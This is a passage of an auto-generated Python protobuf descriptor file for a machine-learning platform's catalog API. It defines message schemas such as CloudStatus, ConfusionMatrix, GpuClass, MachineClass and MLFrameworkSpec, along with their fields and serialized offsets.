name='regions', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudSpec.regions', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1644,
serialized_end=2008,
)
_CLOUDSTATUS = _descriptor.Descriptor(
name='CloudStatus',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudStatus',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='machineCosts', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudStatus.machineCosts', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='gpuCosts', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudStatus.gpuCosts', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2011,
serialized_end=2210,
)
_COMPILERSPEC = _descriptor.Descriptor(
name='CompilerSpec',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CompilerSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='enable', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CompilerSpec.enable', index=0,
number=1, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='compiler', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CompilerSpec.compiler', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='targets', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CompilerSpec.targets', index=2,
number=3, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2212,
serialized_end=2277,
)
_CONFUSIONMATRIX = _descriptor.Descriptor(
name='ConfusionMatrix',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrix',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='rows', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrix.rows', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2279,
serialized_end=2387,
)
_CONFUSIONMATRIXROW = _descriptor.Descriptor(
name='ConfusionMatrixRow',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrixRow',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='t', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrixRow.t', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='p', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrixRow.p', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='count', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrixRow.count', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pct', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrixRow.pct', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2389,
serialized_end=2459,
)
_CURVEPOINT = _descriptor.Descriptor(
name='CurvePoint',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CurvePoint',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CurvePoint.x', index=0,
number=1, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CurvePoint.y', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2461,
serialized_end=2495,
)
_DATACENTER = _descriptor.Descriptor(
name='DataCenter',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.DataCenter',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.DataCenter.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='code', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.DataCenter.code', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2497,
serialized_end=2537,
)
_FLOATPARAMETER = _descriptor.Descriptor(
name='FloatParameter',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.FloatParameter',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.FloatParameter.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='min', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.FloatParameter.min', index=1,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.FloatParameter.max', index=2,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='defaultValue', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.FloatParameter.defaultValue', index=3,
number=5, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.FloatParameter.log', index=4,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2539,
serialized_end=2630,
)
_GITHUBEVENTS = _descriptor.Descriptor(
name='GithubEvents',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GithubEvents',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='gitConnectionName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GithubEvents.gitConnectionName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='repository', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GithubEvents.repository', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='branch', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GithubEvents.branch', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='blobNameRegex', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GithubEvents.blobNameRegex', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='events', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GithubEvents.events', index=4,
number=5, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2632,
serialized_end=2748,
)
_GPUCLASS = _descriptor.Descriptor(
name='GpuClass',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClass',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClass.code', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='regionName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClass.regionName', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vcpu', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClass.vcpu', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='gpumem', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClass.gpumem', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2750,
serialized_end=2872,
)
_GPUCLASSCOST = _descriptor.Descriptor(
name='GpuClassCost',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClassCost',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClassCost.code', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='region', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClassCost.region', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='costPerMinute', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClassCost.costPerMinute', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='costSpot', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClassCost.costSpot', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2875,
serialized_end=3056,
)
_INTPARAMETER = _descriptor.Descriptor(
name='IntParameter',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.IntParameter',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.IntParameter.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='type', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.IntParameter.type', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='min', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.IntParameter.min', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.IntParameter.max', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='defaultValue', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.IntParameter.defaultValue', index=4,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=3058,
serialized_end=3148,
)
_LIB = _descriptor.Descriptor(
name='Lib',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Lib',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='frameworks', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Lib.frameworks', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='version', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Lib.version', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=3150,
serialized_end=3192,
)
_LOGS = _descriptor.Descriptor(
name='Logs',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Logs',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='bucketName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Logs.bucketName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='paths', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Logs.paths', index=1,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=3194,
serialized_end=3235,
)
_MLFRAMEWORK = _descriptor.Descriptor(
name='MLFramework',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFramework',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFramework.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='spec', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFramework.spec', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=3238,
serialized_end=3407,
)
_MLFRAMEWORKLIST = _descriptor.Descriptor(
name='MLFrameworkList',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkList.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='items', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkList.items', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=3410,
serialized_end=3578,
)
# Generated protobuf Descriptor for catalog.v1alpha1.MLFrameworkSpec.
# Four optional string fields (type=9 is TYPE_STRING): url, description,
# version, lang. NOTE: auto-generated by protoc — do not hand-edit values;
# serialized_start/end are byte offsets into the serialized FileDescriptorProto.
_MLFRAMEWORKSPEC = _descriptor.Descriptor(
  name='MLFrameworkSpec',
  full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkSpec',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='url', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkSpec.url', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='description', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkSpec.description', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='version', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkSpec.version', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='lang', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkSpec.lang', index=3,
      number=4, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=3580,
  serialized_end=3662,
)
# Generated protobuf Descriptor for catalog.v1alpha1.MachineClass.
# Fields: code/regionName/storage (strings), mem (message, type=11 —
# message type is resolved later in the generated file), vcpu (int32, type=5).
_MACHINECLASS = _descriptor.Descriptor(
  name='MachineClass',
  full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClass',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='code', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClass.code', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='regionName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClass.regionName', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='mem', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClass.mem', index=2,
      number=3, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='vcpu', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClass.vcpu', index=3,
      number=4, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='storage', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClass.storage', index=4,
      number=5, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=3665,
  serialized_end=3805,
)
# Generated protobuf Descriptor for catalog.v1alpha1.MachineClassCost.
# Fields: code/region (strings), costPerMinute/costSpot (message-typed,
# type=11 — presumably a quantity/price message; resolved elsewhere in file).
_MACHINECLASSCOST = _descriptor.Descriptor(
  name='MachineClassCost',
  full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClassCost',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='code', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClassCost.code', index=0,
